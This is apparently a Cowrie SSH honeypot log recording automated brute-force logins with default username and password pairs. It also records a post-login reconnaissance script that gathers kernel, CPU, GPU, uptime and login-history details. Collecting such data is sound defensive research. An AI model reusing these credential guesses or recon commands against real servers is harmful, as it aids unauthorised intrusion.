{"eventid":"cowrie.login.failed","username":"yusuf","password":"abcd1234","message":"login attempt [yusuf/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:14.519328Z","src_ip":"212.227.235.229","session":"db8d9cdcd4af"}
{"eventid":"cowrie.login.failed","username":"yusuf","password":"abc1234","message":"login attempt [yusuf/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:15.649582Z","src_ip":"212.227.235.229","session":"db8d9cdcd4af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34414,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8c3335b42af","protocol":"ssh","message":"New connection: 212.227.125.160:34414 (1.2.3.4:22) [session: a8c3335b42af]","sensor":"my-vps","timestamp":"2025-08-26T11:52:15.897830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:15.899120Z","src_ip":"212.227.125.160","session":"a8c3335b42af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:15.950336Z","src_ip":"212.227.125.160","session":"a8c3335b42af"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:52:16.175480Z","src_ip":"212.227.125.160","session":"a8c3335b42af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:52:16.418909Z","src_ip":"212.227.125.160","session":"a8c3335b42af"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:52:16.419623Z","src_ip":"212.227.125.160","session":"a8c3335b42af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:16.698866Z","src_ip":"212.227.125.160","session":"a8c3335b42af"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:16.700101Z","src_ip":"212.227.125.160","session":"a8c3335b42af"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:16.779794Z","src_ip":"212.227.235.229","session":"db8d9cdcd4af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35180,"dst_ip":"1.2.3.4","dst_port":22,"session":"f128c69b3c8b","protocol":"ssh","message":"New connection: 212.227.125.160:35180 (1.2.3.4:22) [session: f128c69b3c8b]","sensor":"my-vps","timestamp":"2025-08-26T11:52:22.310918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:22.311728Z","src_ip":"212.227.125.160","session":"f128c69b3c8b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:22.362512Z","src_ip":"212.227.125.160","session":"f128c69b3c8b"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:22.827460Z","src_ip":"212.227.125.160","session":"f128c69b3c8b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:23.026412Z","src_ip":"212.227.125.160","session":"a08e50f829a5"}
{"eventid":"cowrie.session.closed","duration":180.16805958747864,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:23.031357Z","src_ip":"212.227.125.160","session":"a08e50f829a5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:23.881700Z","src_ip":"212.227.125.160","session":"f128c69b3c8b"}
{"eventid":"cowrie.session.closed","duration":34.396156311035156,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:25.707142Z","src_ip":"212.227.235.229","session":"f2f216378ca3"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":49786,"dst_ip":"1.2.3.4","dst_port":22,"session":"79e18da7c1be","protocol":"ssh","message":"New connection: 83.168.105.65:49786 (1.2.3.4:22) [session: 79e18da7c1be]","sensor":"my-vps","timestamp":"2025-08-26T11:52:27.734067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:27.734861Z","src_ip":"83.168.105.65","session":"79e18da7c1be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:27.775365Z","src_ip":"83.168.105.65","session":"79e18da7c1be"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:27.897474Z","src_ip":"83.168.105.65","session":"79e18da7c1be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35948,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5f0706dc263","protocol":"ssh","message":"New connection: 212.227.125.160:35948 (1.2.3.4:22) [session: f5f0706dc263]","sensor":"my-vps","timestamp":"2025-08-26T11:52:28.503768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:28.868766Z","src_ip":"212.227.125.160","session":"f5f0706dc263"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:28.870246Z","src_ip":"212.227.125.160","session":"f5f0706dc263"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:28.940205Z","src_ip":"83.168.105.65","session":"79e18da7c1be"}
{"eventid":"cowrie.login.failed","username":"webserv","password":"webserv","message":"login attempt [webserv/webserv] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:29.390527Z","src_ip":"212.227.125.160","session":"f5f0706dc263"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:30.445515Z","src_ip":"212.227.125.160","session":"f5f0706dc263"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36708,"dst_ip":"1.2.3.4","dst_port":22,"session":"4547a705a6a5","protocol":"ssh","message":"New connection: 212.227.125.160:36708 (1.2.3.4:22) [session: 4547a705a6a5]","sensor":"my-vps","timestamp":"2025-08-26T11:52:34.147422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:34.293759Z","src_ip":"212.227.125.160","session":"4547a705a6a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:34.296328Z","src_ip":"212.227.125.160","session":"4547a705a6a5"}
{"eventid":"cowrie.login.failed","username":"beaver","password":"beaver","message":"login attempt [beaver/beaver] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:34.876370Z","src_ip":"212.227.125.160","session":"4547a705a6a5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:35.931356Z","src_ip":"212.227.125.160","session":"4547a705a6a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44864,"dst_ip":"1.2.3.4","dst_port":22,"session":"fba3ece64adc","protocol":"ssh","message":"New connection: 212.227.235.229:44864 (1.2.3.4:22) [session: fba3ece64adc]","sensor":"my-vps","timestamp":"2025-08-26T11:52:36.648896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:36.862062Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:52:36.862858Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:52:38.540959Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:52:39.094103Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.094822Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.095631Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.096693Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.097955Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.098864Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.099689Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.100735Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.101176Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.101660Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.102118Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.102691Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.103248Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.412392Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.413296Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.414156Z","src_ip":"212.227.235.229","session":"fba3ece64adc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37490,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0270f917380","protocol":"ssh","message":"New connection: 212.227.125.160:37490 (1.2.3.4:22) [session: e0270f917380]","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.951353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:39.961018Z","src_ip":"212.227.125.160","session":"e0270f917380"}
